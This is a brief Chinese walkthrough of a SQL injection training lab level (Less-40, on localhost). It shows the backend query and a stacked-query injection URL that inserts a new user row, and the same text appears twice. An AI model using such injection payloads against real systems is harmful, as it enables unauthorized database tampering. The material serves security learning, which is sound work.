本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1
我们根据sql语句构造以下的payload:
http://127.0.0.1/sql/Less-40/index.php?id=1');insert into users(id,username,password) values ('40','less40','hello')--+
可以看到插入成功
本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1
我们根据sql语句构造以下的payload:
http://127.0.0.1/sql/Less-40/index.php?id=1');insert into users(id,username,password) values ('40','less40','hello')--+
可以看到插入成功